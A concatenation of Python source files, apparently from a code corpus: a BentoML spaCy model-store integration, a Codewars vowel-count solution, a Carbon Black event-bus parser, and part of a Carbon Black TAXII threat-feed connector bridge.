"We will only return the path of projects saved under the BentoML modelstore"
" and leave project interaction for users to decide what they want to do."
" Refer to https://spacy.io/api/cli#project for more information."
)
return os.path.join(model.path, model.info.options["target_path"])
raise BentoMLException(
"Cannot use `bentoml.spacy.load_project()` to load non-Spacy projects. If your"
" model is not a Spacy project, use `bentoml.spacy.load()` instead."
)
@inject
def load(
tag: t.Union[str, Tag],
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
vocab: t.Union["Vocab", bool] = True, # type: ignore[reportUnknownParameterType]
disable: t.Iterable[str] = util.SimpleFrozenList(), # noqa
exclude: t.Iterable[str] = util.SimpleFrozenList(), # noqa
config: t.Union[t.Dict[str, t.Any], "Config"] = util.SimpleFrozenDict(), # noqa
) -> "spacy.language.Language":
"""
Load a model from BentoML local modelstore with given name.
Args:
tag (:code:`Union[str, Tag]`):
Tag of a saved model in BentoML local modelstore.
model_store (:mod:`~bentoml._internal.models.store.ModelStore`, default to :mod:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
vocab (:code:`Union[spacy.vocab.Vocab, bool]`, `optional`, defaults to `True`):
Optional vocab to pass in on initialization. If True, a new Vocab object will be created.
disable (`Iterable[str]`, `optional`):
Names of pipeline components to disable.
exclude (`Iterable[str]`, `optional`):
Names of pipeline components to exclude. Excluded
components won't be loaded.
config (:code:`Union[Dict[str, Any], spacy.Config]`, `optional`):
Config overrides as nested dict or dict
keyed by section values in dot notation.
Returns:
:obj:`spacy.language.Language`: an instance of :obj:`spacy.Language` from BentoML modelstore.
Examples:
.. code-block:: python
import bentoml
model = bentoml.spacy.load('custom_roberta')
"""
model = model_store.get(tag)
if model.info.module not in (MODULE_NAME, __name__):
raise BentoMLException(
f"Model {tag} was saved with module {model.info.module}, failed loading with {MODULE_NAME}."
)
if "projects_uri" in model.info.options:
raise BentoMLException(
"Cannot use `bentoml.spacy.load()` to load Spacy Projects. Use"
" `bentoml.spacy.load_project()` instead."
)
required = model.info.options["pip_package"]
try:
_ = importlib.import_module(required)
except ModuleNotFoundError:
try:
from spacy.cli.download import download
# TODO: move this to runner on startup hook
download(required)
except (SystemExit, Exception): # pylint: disable=broad-except
logger.warning(
f"{required} cannot be downloaded as pip package. If this"
" is a custom pipeline there is nothing to worry about."
" If this is a pretrained model provided by Explosion make"
" sure that you save the correct package and model to BentoML"
" via `bentoml.spacy.save()`"
)
try:
# check if pipeline has additional requirements then all related
# pip package has been installed correctly.
additional = model.info.options["additional_requirements"]
not_existed = list() # type: t.List[str]
dists = packages_distributions()
for module_name in additional:
mod, _ = split_requirement(module_name)
if mod not in dists:
not_existed.append(module_name)
if len(not_existed) > 0:
raise MissingDependencyException(
f"`{','.join(not_existed)}` is required by `{tag}`."
)
except KeyError:
pass
return util.load_model(
model.path, vocab=vocab, disable=disable, exclude=exclude, config=config
)
@inject
def save(
name: str,
model: "spacy.language.Language",
*,
metadata: t.Union[None, t.Dict[str, t.Any]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> Tag:
"""
Save a model instance to BentoML modelstore.
Args:
name (:code:`str`):
Name for given model instance. This should pass Python identifier check.
model (`spacy.language.Language`):
Instance of model to be saved
metadata (:code:`Dict[str, Any]`, `optional`, default to :code:`None`):
Custom metadata for given model.
model_store (:mod:`~bentoml._internal.models.store.ModelStore`, default to :mod:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`~bentoml._internal.types.Tag`: A :obj:`tag` with a format `name:version` where `name` is the user-defined model's name, and a generated `version` by BentoML.
Examples:
.. code-block:: python
import spacy
import bentoml.spacy
nlp = spacy.load("en_core_web_trf")
# custom training or layers here
bentoml.spacy.save("spacy_roberta", nlp)
""" # noqa
context: t.Dict[str, t.Any] = {
"framework_name": "spacy",
"pip_dependencies": [f"spacy=={get_pkg_version('spacy')}"],
}
_model = Model.create(
name,
module=MODULE_NAME,
options=None,
context=context,
metadata=metadata,
)
meta = model.meta
pip_package = f"{meta['lang']}_{meta['name']}"
_model.info.options = {"pip_package": pip_package}
if "requirements" in meta:
_model.info.options["additional_requirements"] = meta["requirements"]
model.to_disk(_model.path)
_model.save(model_store)
return _model.tag
@inject
def projects(
save_name: str,
tasks: str,
name: t.Optional[str] = None,
repo_or_store: t.Optional[str] = None,
remotes_config: t.Optional[t.Dict[str, t.Dict[str, str]]] = None,
*,
branch: t.Optional[str] = None,
sparse_checkout: bool = False,
verbose: bool = True,
metadata: t.Optional[t.Dict[str, t.Any]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> Tag:
"""
Enables users to use :code:`spacy cli` and integrate SpaCy `Projects <https://spacy.io/usage/projects>`_ to BentoML.
Args:
save_name (:code:`str`):
Name for given model instance. This should pass Python identifier check.
tasks (:code:`str`):
Given SpaCy CLI tasks. Currently only :code:`pull` and :code:`clone` are supported
repo_or_store(:code:`str`, `optional`, defaults to `None`):
URL of Git repo or given S3 store containing project templates.
model (`spacy.language.Language`):
Instance of model to be saved
metadata (:code:`Dict[str, Any]`, `optional`, default to :code:`None`):
Custom metadata for given model.
branch (:code:`str`, `optional`, defaults to `None`):
The branch to clone from. If not specified, defaults to :code:`main` branch
verbose (`bool`, `optional`, default to :code:`True`):
Verbosely post all logs.
model_store (:mod:`~bentoml._internal.models.store.ModelStore`, default to :mod:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`~bentoml._internal.types.Tag`: A :obj:`tag` with a format `name:version` where `name` is the user-defined model's name, and a generated `version` by BentoML.
.. warning::
This is an **EXPERIMENTAL** API as it is subjected to change. We are also looking for feedback.
Examples:
.. code-block:: python
import bentoml
clone_tag = bentoml.spacy.projects(
"test_spacy_project",
"clone",
name="integrations/huggingface_hub",
repo_or_store="https://github.com/aarnphm/bentoml-spacy-projects-integration-tests",
)
project_path = bentoml.spacy.load_project(clone_tag)
project_yml = {
"remotes": {
"default": "https://github.com/aarnphm/bentoml-spacy-projects-integration-tests/tree/v3/pipelines/tagger_parser_ud",
}
}
pull_tag = bentoml.spacy.projects("test_pull", "pull", remotes_config=project_yml)
project_path = bentoml.spacy.load_project(pull_tag)
""" # noqa
# EXPERIMENTAL: note that these functions are direct modified implementation
# from spacy internal API. Subject to change, use with care!
from spacy.cli.project.pull import project_pull
from spacy.cli.project.clone import project_clone
if repo_or_store is None:
repo_or_store = getattr(spacy.about, "__projects__")
if branch is None:
branch = getattr(spacy.about, "__projects_branch__")
if tasks in PROJECTS_CMD_NOT_SUPPORTED:
raise BentoMLException(
"""\
BentoML only supports `clone` and `pull` for
git and remote storage from SpaCy CLI to
save into modelstore. Refers to
https://spacy.io/api/cli#project for more
information on SpaCy Projects.
"""
)
context: t.Dict[str, t.Any] = {
"framework_name": "spacy",
"pip_dependencies": [f"spacy=={get_pkg_version('spacy')}"],
"tasks": tasks,
}
_model = Model.create(
save_name,
module=MODULE_NAME,
options=None,
context=context,
metadata=metadata,
)
output_path = _model.path_of(SAVE_NAMESPACE)
_model.info.options = {"projects_uri": repo_or_store, "target_path": SAVE_NAMESPACE}
if tasks == "clone":
# TODO: update check for master or main branch
assert (
name is not None
), "`name` of the template is required to clone a project."
_model.info.options["name"] = name
assert isinstance(repo_or_store, str) and isinstance(branch, str)
project_clone(
name,
Path(output_path),
repo=repo_or_store,
branch=branch,
sparse_checkout=sparse_checkout,
)
copy_tree(_model.path, output_path)
else:
# works with S3 bucket, haven't failed yet
assert (
remotes_config is not None
), """\
`remotes_config` is required in order to pull projects into
BentoML modelstore. Refers to
https://spacy.io/usage/projects#remote
for more information. We will accept remotes
as shown:
{
'remotes':
{
'default':'s3://spacy-bucket',
}
}
"""
os.makedirs(output_path, exist_ok=True)
with Path(output_path, "project.yml").open("w") as inf:
yaml.dump(remotes_config, inf)
for remote in remotes_config.get("remotes", {}):
pull: "partial[t.Generator[t.Tuple[str, str], None, None]]" = partial(
project_pull, remote=remote, verbose=verbose
)
for url, res_path in pull(Path(output_path)):
if url is not None: # pragma: no cover
logger.info(f"Pulled {res_path} from {repo_or_store}")
_model.save(model_store)
return _model.tag
class _SpacyRunner(Runner):
@inject
def __init__(
self,
tag: Tag,
gpu_device_id: t.Optional[int],
name: str,
resource_quota: t.Optional[t.Dict[str, t.Any]],
batch_options: t.Optional[t.Dict[str, t.Any]],
vocab: t.Union["Vocab", bool], # type: ignore[reportUnknownParameterType]
disable: t.Iterable[str],
exclude: t.Iterable[str],
config: t.Union[t.Dict[str, t.Any], "Config"],
as_tuples: t.Union[Literal[True], Literal[False]],
batch_size: t.Optional[int],
component_cfg: t.Optional[t.Dict[str, t.Dict[str, t.Any]]],
backend_options: t.Optional[Literal["pytorch", "tensorflow"]] = "pytorch",
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
):
in_store_tag = model_store.get(tag).tag
super().__init__(name, resource_quota, batch_options)
self._tag = in_store_tag
self._vocab: t.Union["Vocab", bool] = vocab
self._disable = disable
self._exclude = exclude
self._config = config
self._model_store = model_store
self._backend_options = backend_options
self._gpu_device_id = gpu_device_id
if self._gpu_device_id is not None:
if resource_quota is None:
resource_quota = dict(gpus=self._gpu_device_id)
else:
resource_quota["gpus"] = self._gpu_device_id
self._configure(backend_options)
self._as_tuples = as_tuples
self._batch_size = batch_size
self._component_cfg = component_cfg
super().__init__(str(tag), resource_quota, batch_options)
def _configure(self, backend_options: t.Optional[str]) -> None:
if self._gpu_device_id is not None and thinc_util.prefer_gpu(
self._gpu_device_id
): # pragma: no cover
assert backend_options is not None
if backend_options == "pytorch":
thinc_backends.use_pytorch_for_gpu_memory()
else:
thinc_backends.use_tensorflow_for_gpu_memory()
thinc_util.require_gpu(self._gpu_device_id)
thinc_backends.set_gpu_allocator(backend_options)
thinc_util.set_active_gpu(self._gpu_device_id)
else:
thinc_util.require_cpu()
@property
def required_models(self) -> t.List[Tag]:
return [self._tag]
@property
def num_concurrency_per_replica(self) -> int:
if self.resource_quota.on_gpu:
return 1
return int(round(self.resource_quota.cpu))
def _get_pytorch_gpu_count(self) -> t.Optional[int]:
assert self._backend_options == "pytorch"
devs = getattr(torch, "cuda").device_count()
if devs == 0:
logger.warning("Installation of Torch is not CUDA-enabled.")
logger.warning(
_TORCH_TF_WARNING.format(
framework="PyTorch",
package="torch",
link="https://pytorch.org/get-started/locally/",
)
)
return None
return devs
def _get_tensorflow_gpu_count(self) -> t.Optional[int]:
assert self._backend_options == "tensorflow"
from tensorflow.python.client import (
device_lib, # type: ignore; pylint: disable=E0611
)
try:
return len(
[
x
for x in getattr(device_lib, "list_local_devices")()
if getattr(x, "device_type") == "GPU"
]
)
except (AttributeError, Exception): # pylint: disable=broad-except
logger.warning(
_TORCH_TF_WARNING.format(
framework="Tensorflow 2.x",
package="tensorflow",
link="https://www.tensorflow.org/install/gpu",
)
)
return None
@property
def num_replica(self) -> int:
if self.resource_quota.on_gpu:
if self._backend_options == "pytorch":
num_devices = self._get_pytorch_gpu_count()
else:
num_devices = self._get_tensorflow_gpu_count()
return num_devices if num_devices is not None else 1
return 1
# pylint: disable=arguments-differ,attribute-defined-outside-init
def _setup(self) -> None:
self._model = load(
self._tag,
model_store=self._model_store,
vocab=self._vocab,
exclude=self._exclude,
disable=self._disable,
config=self._config,
)
# pylint: disable=arguments-differ
def _run_batch( # type: ignore[reportIncompatibleMethodOverride]
self,
input_data: t.Union[t.Iterable[t.Tuple[t.Union[str, "Doc"], t.Any]], t.Union[str, "Doc"]], # type: ignore[reportUnknownParameterType] # noqa: LN001
) -> t.Union[t.Iterator["Doc"], t.Iterator[t.Tuple["Doc", t.Any]]]: # type: ignore[reportUnknownParameterType] # noqa: LN001
return self._model.pipe( # type: ignore[reportGeneralTypeIssues]
input_data, # type: ignore[reportGeneralTypeIssues]
as_tuples=self._as_tuples,
batch_size=self._batch_size,
disable=self._disable,
component_cfg=self._component_cfg,
n_process=self.num_replica,
)
@inject
def load_runner(
tag: t.Union[str, Tag],
*,
gpu_device_id: t.Optional[int] = None,
backend_options: t.Optional[Literal["pytorch", "tensorflow"]] = None,
name: t.Optional[str] = None,
resource_quota: t.Optional[t.Dict[str, t.Any]] = None,
batch_options: t.Optional[t.Dict[str, t.Any]] = None,
vocab: t.Union["Vocab", bool] = True, # type: ignore[reportUnknownParameterType]
disable: t.Iterable[str] = util.SimpleFrozenList(), # noqa
exclude: t.Iterable[str] = util.SimpleFrozenList(), # noqa
config: t.Union[t.Dict[str, t.Any], "Config"] = util.SimpleFrozenDict(), # noqa
as_tuples: t.Union[Literal[True], Literal[False]] = False,
batch_size: t.Optional[int] = None,
component_cfg: t.Optional[t.Dict[str, t.Dict[str, t.Any]]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> "_SpacyRunner":
"""
Runner represents a unit of serving logic that can be scaled horizontally to
maximize throughput. :func:`bentoml.spacy.load_runner` implements a Runner class that
wraps around a :obj:`spacy.language.Language` model, which optimizes it for the BentoML runtime.
Args:
tag (:code:`Union[str, Tag]`):
Tag of a saved model in BentoML local modelstore.
gpu_device_id (`int`, `optional`, defaults to `None`):
GPU device ID.
backend_options (`Literal['pytorch', 'tensorflow']`, `optional`, defaults to `None`):
Backend options for Thinc. Either PyTorch or Tensorflow.
resource_quota (:code:`Dict[str, Any]`, default to :code:`None`):
Dictionary to configure resources allocation for runner.
batch_options (:code:`Dict[str, Any]`, default to :code:`None`):
Dictionary to configure batch options for runner in a service context.
model_store (:mod:`~bentoml._internal.models.store.ModelStore`, default to :mod:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
vocab (:code:`Union[spacy.vocab.Vocab, bool]`, `optional`, defaults to `True`):
Optional vocab to pass in on initialization. If True, a new Vocab object will be created.
disable (`Iterable[str]`, `optional`):
Names of pipeline components to disable.
exclude (`Iterable[str]`, `optional`):
Names of pipeline components to exclude. Excluded
components won't be loaded.
config (:code:`Union[Dict[str, Any], spacy.Config]`, `optional`):
Config overrides as nested dict or dict
keyed by section values in dot notation.
as_tuples (`Literal[False, True]`, `optional`, defaults to `False`):
If set to True, inputs should be a sequence of
(text, context) tuples. Output will then be a sequence of
(doc, context) tuples.
batch_size (`int`, `optional`, defaults to `None`):
The number of texts to buffer.
component_cfg (:code:`Dict[str, :code:`Dict[str, Any]]`, `optional`, defaults to `None`):
An optional dictionary with extra keyword
arguments for specific components.
Returns:
:obj:`~bentoml._internal.runner.Runner`: Runner instances for the target :mod:`bentoml.spacy` model
Examples:
.. code-block:: python
import bentoml
runner = bentoml.spacy.load_runner("my_spacy_model:latest")
runner.run("This is a test sentence.")
"""
tag = Tag.from_taglike(tag)
if name is None:
name = tag.name
return _SpacyRunner(
tag=tag,
gpu_device_id=gpu_device_id,
backend_options=backend_options,
name=name,
resource_quota=resource_quota,
batch_options=batch_options,
vocab=vocab,
disable=disable,
exclude=exclude,
config=config,
as_tuples=as_tuples,
batch_size=batch_size,
component_cfg=component_cfg,
model_store=model_store,
)
``` |
{
"source": "JJessee1371/codewars---python",
"score": 4
} |
#### File: Algorithms/VowelCount/vowelCount.py
```python
def vowelCount(word):
    # Count and print the number of lowercase vowels in the given string
    count = 0
    for i in word:
        if i == "a" or i == "e" or i == "u" or i == "i" or i == "o":
            count += 1
    print(count)
exString = "Count the vowels in me!"
vowelCount(exString)
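# A more idiomatic sketch (an illustrative alternative, not part of the original
# kata solution): test membership against a set of vowels and return the count so
# the function can be reused and asserted against instead of only printing.
def vowel_count(text):
    """Return the number of lowercase vowels in `text`."""
    vowels = {"a", "e", "i", "o", "u"}
    return sum(1 for ch in text if ch in vowels)

assert vowel_count("Count the vowels in me!") == 7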
``` |
{
"source": "jjfallete/cb-event-forwarder",
"score": 3
} |
#### File: cbeventforwarder/lib/event_parser.py
```python
import json
import logging
import event_helpers
LOGGER = logging.getLogger(__name__)
class EventParser(object):
def __init__(self, options):
self.sensor_id_to_details_map = {}
self.cb_server = options.get("server_name", None)
def parse_event_pb(self, protobuf_bytes, routing_key):
"""
Parse an EDR event bus message that is in a protobuf format
"""
(sensor_id, event_obj) = event_helpers.protobuf_to_obj_and_host(protobuf_bytes)
# since we have multiple object types
# we overwrite some fields in the protobuf based
# event object
event_obj["event_type"] = event_obj["type"]
event_obj["type"] = routing_key
# and the server identifier
if self.cb_server is not None:
event_obj["cb_server"] = self.cb_server
return [event_obj]
@staticmethod
def get_process_guid_from_id(unique_id):
"""
Extract the process GUID from a process' unique ID.
A process' unique ID may contain a segment ID, which needs to be stripped out (e.g. "<process_guid>-<segment_id>")
"""
parts = unique_id.split("-")
if len(parts) == 6:
parts = parts[0:5]
return "-".join(parts)
else:
return unique_id
def fix_process_guids(self, event):
"""
Extract and map process GUIDs based on their unique IDs
"""
if "docs" in event:
for d in event["docs"]:
if "unique_id" in d:
d["process_guid"] = self.get_process_guid_from_id(d["unique_id"])
if "parent_unique_id" in d:
d["parent_guid"] = self.get_process_guid_from_id(d["parent_unique_id"])
if "process_id" in event:
pid = event["process_id"]
event["process_guid"] = pid
del event["process_id"]
return event
def parse_event_json(self, msg_body, routing_key):
"""
Parse an EDR event bus message that is in a JSON format
"""
json_obj = json.loads(msg_body)
json_obj["type"] = routing_key
ret_events = []
# for two types of alerts the matches
# are coalesced into a single alert;
# for our purposes we split them apart
if routing_key.startswith("watchlist.hit."):
for d in json_obj["docs"]:
c = json_obj.copy()
c["docs"] = [d]
ret_events.append(c)
else:
ret_events.append(json_obj)
for event_obj in ret_events:
if "highlights" in event_obj:
del event_obj["highlights"]
# keep the timestamp field name consistent
if "event_timestamp" in event_obj:
event_obj["timestamp"] = event_obj["event_timestamp"]
del event_obj["event_timestamp"]
#
# when it makes sense add sensor
# information to the object. This is dependent
# on the object type
#
if routing_key == "watchlist.storage.hit.process" or routing_key == "watchlist.hit.process":
# "docs" is a list of documents; copy the hostname into computer_name on each
for d in event_obj["docs"]:
    if "hostname" in d:
        d["computer_name"] = d["hostname"]
else:
# rather than track the correct object types - just look
# for a hostname
if "hostname" in event_obj:
event_obj["computer_name"] = event_obj["hostname"]
# fix up terminology on process id/guid so that "process_guid" always
# refers to the process guid (minus segment)
event_obj = self.fix_process_guids(event_obj)
# add the "cb_server" field to the json. This is used
# to tie the event to a specific cluster/server in environments
# where multiple servers are deployed
# some of the watchlist events have a server_name field but that
# might reference a minion within a cluster or can sometimes be blank
if self.cb_server is not None:
event_obj["cb_server"] = self.cb_server
return ret_events
def parse_events(self, content_type, routing_key, body):
"""
Parse a RabbitMQ event based on its content type and routing key
Note: Result is an array of events as one message bus event may yield multiple events
"""
try:
if "application/protobuf" == content_type:
# if the type is protobuf - we handle it here
# this means it is a raw sensor event
return self.parse_event_pb(body, routing_key)
elif "application/json" == content_type:
# handle things already in JSON
return self.parse_event_json(body, routing_key)
else:
raise ValueError("Unexpected content_type: %s" % content_type)
except Exception as e:
LOGGER.exception("%s" % e)
return []
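# --- Illustrative usage sketch (not part of the original module) ----------------
# The routing key, server name and JSON body below are made-up sample values; only
# EventParser.parse_events() and get_process_guid_from_id() from this module are real.
if __name__ == "__main__":
    parser = EventParser({"server_name": "cb-server-01"})

    # A trailing segment ID (the sixth dash-separated field) is stripped from a unique ID.
    print(EventParser.get_process_guid_from_id(
        "00000001-0000-0a2c-01d2-a1e0b2c3d4e5-0000000001"))

    # JSON bus messages are parsed into a list of event dictionaries.
    sample = json.dumps({"event_timestamp": 1700000000, "hostname": "WORKSTATION-1"})
    for event in parser.parse_events("application/json", "feed.hit.process", sample):
        print(event["type"], event["cb_server"], event["computer_name"])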
``` |
{
"source": "jjfallete/cb-taxii-connector",
"score": 2
} |
#### File: connectors/taxii/bridge.py
```python
import gc
import logging
import os
import signal
import sys
import threading
import time
import traceback
from logging.handlers import RotatingFileHandler
from multiprocessing import Process, Value
from time import gmtime, strftime
# noinspection PyProtectedMember
from timeit import default_timer as timer
from typing import Any, Dict, List, Optional, Union
import cbint
import flask
import simplejson
from cbapi.errors import ServerError
from cbapi.example_helpers import get_object_by_name_or_id
from cbapi.response import CbResponseAPI, Feed
from cbint.utils import cbserver, flaskfeed
from cbint.utils.daemon import CbIntegrationDaemon
from cbopensource.constant import MiB
from cbopensource.driver.taxii import TaxiiDriver
# override JSON used
from cbopensource.driver.taxii_server_config import TaxiiServerConfiguration
from . import version
from .feed_cache import FeedCache
from .taxii_connector_config import TaxiiConnectorConfiguration, TaxiiConnectorConfigurationException
sys.modules['json'] = simplejson
_logger = logging.getLogger(__name__)
__all__ = ['log_option_value', 'TimeStamp', 'CarbonBlackTaxiiBridge']
# noinspection PySameParameterValue
def log_option_value(label: str, value: Union[str, int], padding: int = 27) -> None:
"""
Info log display of a given option.
:param label: Option label
:param value: option value
:param padding: padding
"""
_logger.info(f"{label:{padding}}: {value}")
class TimeStamp(object):
"""
Class to store and work with timestamps.
"""
def __init__(self, stamp: bool = False):
"""
Initialize the class.
:param stamp: If True, initialize with the current GMT time
"""
self._value = None
if stamp:
self.stamp()
def __str__(self):
if not self._value:
return "Never"
return strftime("%a, %d %b %Y %H:%M:%S +0000", self._value)
def __repr__(self):
return "TimeStamp({0})".format(self.__str__())
# --------------------------------------------------------------------------------
def stamp(self) -> None:
"""
Stamps the value of this TimeStamp with the current GMT time.
"""
self._value = gmtime()
# noinspection PyUnusedFunction
def clone(self) -> 'TimeStamp':
"""
Create a cloned object.
:return: New object with the same timestamp.
"""
ts = TimeStamp()
ts._value = self._value
return ts
class CarbonBlackTaxiiBridge(CbIntegrationDaemon):
"""
Class to manage the bridge between EDR and the Taxii services.
"""
def __init__(self, name: str, configfile: str, logfile: str = None, pidfile: str = None, debug: bool = False):
"""
Initialize the class.
:param name: name of the connector
:param configfile: path to the config file
:param logfile: path to the log file
:param pidfile: path to the PID file
:param debug: If True, execute in DEBUG mode
"""
CbIntegrationDaemon.__init__(self, name, configfile=configfile, logfile=logfile, pidfile=pidfile, debug=debug)
# NOTE: at this point, 'self.cfg' contains the RawConfigParser() object based on the supplied config.ini
# 'self.options' contains a Dict parsed from the 'self.cfg' with a key for each stanza
self.flask_feed = flaskfeed.FlaskFeed(__name__, False, TaxiiConnectorConfiguration.DIRECTORY)
self._config: Optional[TaxiiConnectorConfiguration] = None
self.taxii_servers: List[Dict] = []
self.api_urns = {}
self.validated_config = False
self.cb: Optional[CbResponseAPI] = None
self.sync_needed = False
self.feed_lock = threading.RLock()
self.logfile = logfile
self.debug = debug
self._log_handler = None
self.logger = _logger
self.process = None
self.feed_cache = None
self.flask_feed.app.add_url_rule(TaxiiConnectorConfiguration.CB_IMAGE_PATH,
view_func=self.handle_cb_image_request)
self.flask_feed.app.add_url_rule(TaxiiConnectorConfiguration.INTEGRATION_IMAGE_PATH,
view_func=self.handle_integration_image_request)
self.flask_feed.app.add_url_rule(TaxiiConnectorConfiguration.JSON_FEED_PATH,
view_func=self.handle_json_feed_request,
methods=['GET'])
self.flask_feed.app.add_url_rule("/", view_func=self.handle_index_request, methods=['GET'])
self.flask_feed.app.add_url_rule("/feed.html", view_func=self.handle_html_feed_request, methods=['GET'])
self.initialize_logging()
_logger.debug("generating feed metadata")
with self.feed_lock:
self.last_sync = TimeStamp()
self.last_successful_sync = TimeStamp()
self.feed_ready = False
signal.signal(signal.SIGTERM, self._sigterm_handler)
def initialize_logging(self) -> None:
"""
Initialize the bridge logging.
"""
if not self.logfile:
log_path = f"/var/log/cb/integrations/{self.name}/"
# noinspection PyUnresolvedReferences
cbint.utils.filesystem.ensure_directory_exists(log_path)
self.logfile = f"{log_path}{self.name}.log"
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG if self.debug else logging.INFO)
root_logger.handlers = []
rlh = RotatingFileHandler(self.logfile, maxBytes=10 * MiB, backupCount=10)
rlh.setFormatter(logging.Formatter(fmt="%(asctime)s - %(levelname)-7s - %(module)s - %(message)s"))
self._log_handler = rlh
root_logger.addHandler(rlh)
self.logger = root_logger
@property
def integration_name(self) -> str:
"""
:return: The integration name and version
"""
return f'Cb Taxii Connector {version.__version__}'
def serve(self) -> None:
"""
Start the server.
"""
if self._config.https_proxy:
os.environ['HTTPS_PROXY'] = self._config.https_proxy
os.environ['no_proxy'] = '127.0.0.1,localhost'
address = self._config.listener_address
port = self._config.listener_port
_logger.info(f"starting flask server: {address}:{port}")
self.flask_feed.app.run(port=port, debug=self.debug, host=address, use_reloader=False)
def handle_json_feed_request(self):
"""
Handle a JSON feed request.
TODO: properly type return!
:return:
"""
self._report_memory_usage("hosting")
return flask.send_from_directory(self.feed_cache.location, self.feed_cache.file_name,
mimetype='application/json')
def handle_html_feed_request(self):
"""
Handle an HTML feed request.
TODO: properly type return!
:return:
"""
the_feed = self.feed_cache.read()
if not the_feed:
return flask.Response(status=404)
html = self.flask_feed.generate_html_feed(the_feed, self._config.DISPLAY_NAME)
del the_feed
gc.collect()
return html
def handle_index_request(self):
"""
Handle an index request.
TODO: properly type return!
:return:
"""
with self.feed_lock:
index = self.flask_feed.generate_html_index(self.feed_cache.generate_feed(), self._config.options,
self._config.DISPLAY_NAME, self._config.CB_IMAGE_PATH,
self._config.INTEGRATION_IMAGE_PATH,
self._config.JSON_FEED_PATH, str(self.last_sync))
return index
def handle_cb_image_request(self):
"""
Handle a CB image request.
TODO: properly type return!
:return:
"""
return self.flask_feed.generate_image_response(
image_path=f"{self._config.DIRECTORY}{self._config.CB_IMAGE_PATH}")
def handle_integration_image_request(self):
"""
Handle an integration image request.
TODO: properly type return!
:return:
"""
return self.flask_feed.generate_image_response(image_path=(f"{self._config.DIRECTORY}"
f"{self._config.INTEGRATION_IMAGE_PATH}"))
def on_starting(self) -> None:
"""
On startup, check the feed cache.
"""
self.feed_cache.verify()
def run(self) -> None:
"""
Begin execution of the service.
"""
_logger.info(f"starting VMware Carbon Black EDR <-> taxii Connector | version {version.__version__}")
_logger.debug("starting continuous feed retrieval thread")
work_thread = threading.Thread(target=self.perform_continuous_feed_retrieval)
work_thread.setDaemon(True)
work_thread.start()
_logger.debug("starting flask")
self.serve()
def validate_config(self) -> bool:
"""
Validate internal configuration. If already validated, we simply return.
:return: True if valid, False otherwise
:raises: ValueError if there are configuration problems
"""
if self.validated_config:
return True
self.validated_config = True
_logger.debug("Loading configuration options...")
try:
if 'bridge' not in self.options:
raise ValueError("Configuration does not contain a [bridge] section")
# NOTE: 'bridge' contains the connector settings
try:
self._config = TaxiiConnectorConfiguration.parse(self.options['bridge'])
except TaxiiConnectorConfigurationException:
return False
self.debug = self._config['debug']
self.logger.setLevel(logging.DEBUG if self.debug else logging.getLevelName(self._config['log_level']))
self._log_handler.maxBytes = self._config['log_file_size']
# NOTE: All other option keys besides 'bridge' contain settings for each taxii server
taxii_server_sections = list(filter(lambda section: section != 'bridge', self.cfg.sections()))
if not taxii_server_sections:
raise ValueError("Configuration does not contain section(s) defining a taxii server")
self.taxii_servers = [TaxiiServerConfiguration.parse(self.cfg[server_section]).dict for server_section
in taxii_server_sections]
ca_file = os.environ.get("REQUESTS_CA_BUNDLE", None)
log_option_value("CA Cert File", ca_file if ca_file else "No CA Cert file found.")
self.feed_cache = FeedCache(self._config, self._config['cache_folder'], self.feed_lock)
if not self._config['skip_cb_sync']:
try:
self.cb = CbResponseAPI(url=self._config['carbonblack_server_url'],
token=self._config['carbonblack_server_token'],
ssl_verify=False,
integration_name=self.integration_name)
self.cb.info()
except Exception as e:
raise ValueError(f"Could not connect to Cb Response server: {e}")
except ValueError as e:
sys.stderr.write(f"Configuration Error: {e}\n")
_logger.error(e)
return False
return True
# noinspection PyUnusedLocal
@staticmethod
def _report_memory_usage(title: str) -> None:
"""
Private method to report current memory usage.
NOTE: currently stubbed to only perform garbage collection.
:param title: title of the report
"""
gc.collect()
@staticmethod
def handle_shared_return(shared_return, value: Any) -> Any:
"""
Set a value on a shared return object (if provided), or just return it.
:param shared_return: optional shared value (e.g. multiprocessing.Value) to update
:param value: the value to store and return
:return: the supplied value
"""
if shared_return is not None:
shared_return.value = value
return value
def _do_write_reports(self, shared_return=None) -> bool:
"""
Private method to write TAXII reports.
:return: True if successful
"""
start = timer()
self._report_memory_usage("writing")
with self.feed_cache.create_stream() as feed_stream:
tc = TaxiiDriver(self.taxii_servers)
if tc.write_reports(feed_stream):
self.last_successful_sync.stamp()
_logger.info("Successfully retrieved data at {0} ({1:.3f} seconds total)".format(
self.last_successful_sync, timer() - start))
self._report_memory_usage("saved")
return self.handle_shared_return(shared_return, True)
else:
_logger.warning("Failed to retrieve data at {0} ({1:.3f} seconds total)".format(
TimeStamp(True), timer() - start))
return self.handle_shared_return(shared_return, False)
def _do_retrieve_reports(self, shared_return=None) -> bool:
"""
Private method to retrieve TAXII reports.
:return: True if successful
"""
start = timer()
self._report_memory_usage("reading")
tc = TaxiiDriver(self.taxii_servers)
reports = tc.generate_reports()
self._report_memory_usage("generated")
_logger.debug("Retrieved reports ({0:.3f} seconds).".format(timer() - start))
if reports:
# Instead of rewriting the cache file directly, we're writing to a temporary file
# and then moving it onto the cache file so that we don't have a situation where
# the cache file is only partially written and corrupt or empty.
if self.feed_cache.write_reports(reports):
self.last_successful_sync.stamp()
del reports
_logger.info("Successfully retrieved data at {0} ({1:.3f} seconds total)".format(
self.last_successful_sync, timer() - start))
self._report_memory_usage("saved")
self.handle_shared_return(shared_return, True)
else:
_logger.warning("Failed to retrieve data at {0} ({1:.3f} seconds total)".format(
TimeStamp(True), timer() - start))
return self.handle_shared_return(shared_return, False)
# noinspection PyUnusedLocal
def _sigterm_handler(self, the_signal, frame) -> None:
"""
Private method to handle termination signals.
:param the_signal: the signal received
:param frame: the current stack frame
"""
_logger.info("Process shutting down...")
if self.process:
_logger.info("Sub-process found. Terminating...")
self.process.terminate()
_logger.info("Sub-process terminated.")
sys.exit()
def _retrieve_reports(self) -> bool:
"""
